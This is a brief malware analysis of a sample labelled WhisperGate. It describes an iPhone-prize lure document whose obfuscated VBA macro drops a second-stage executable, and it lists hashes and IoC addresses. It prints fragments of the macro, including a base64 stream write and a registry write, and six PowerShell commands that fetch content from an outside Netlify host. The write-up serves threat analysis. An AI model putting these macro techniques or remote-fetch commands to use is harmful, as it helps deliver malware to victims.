WhisperGate Malware Analysis
Stage 1: b621c0e744c03b45c0b32f244a6b8b4a84c449ffde4a62e52d8acfdf6fac264a
Sample.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ABCD1980Ge@outlook[.]com, Template: Normal.dotm, Last Saved By: ABCD1980Ge@outlook[.]com, Revision Number: 21, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:33:00, Create Time/Date: Wed Jun 14 13:48:00 2023, Last Saved Time/Date: Wed Jun 14 16:08:00 2023, Number of Pages: 13, Number of Words: 4513, Number of Characters: 25727, Security: 0
the document have a form like structure for scamming of the victim for winning iPhone13 pro, upon clicking Apply button it drops an executable.
the vba code is hinghly obfuscated, so instead of manually skimming through code to analyze it, we can use vipermonkey vba code emulation tool.
the highlight of macro code
s = CreateObject (qrst) .UserName
Set fso = CreateObject (abcdefgh)
//
Exists1 = fso.FolderExists(hij)
On Error Resume Next
If Exists1 = TRUE Then
//
s1 = a()
On Error Resume Next
s2 = b()
On Error Resume Next
s3 = c()
svekbt = s1 + s2 + s3
Set streamOutput = CreateObject ("ADODB.Stream")
Set xmlDoc = CreateObject ("Microsoft.XMLDOM")
Set xmlElem = xmlDoc.createElement("tmp")
xmlElem.dataType = "bin.base64"
streamOutput.Type = UseBinaryStreamType
streamOutput.Write = xmlElem.nodeTypedValue
Set myWS = CreateObject (abcdef)
myWS. RegWrite i_tvrky, i_oledy, i_soper
Private Sub CommandButton1_Click()
CoBFile
End Sub
STAGE 2:
Winsearch.exe a4d7844280a7af693b468225e73496e2341faac96db6bc5194e58e22e2bf3413
This 2nd stage binary spawns cmd and runs some commands
cmd 1
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello1.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 2
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 3
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 4
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 5
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello1.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 6
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
IoC
35.156.224.161 34.159.132.250 34.159.25.198 3.72.140.173 35.198.80.163 18.192.231.252 224.0.0.252 239.255.255.250 3.72.140.173 34.159.25.198 18.192.231.252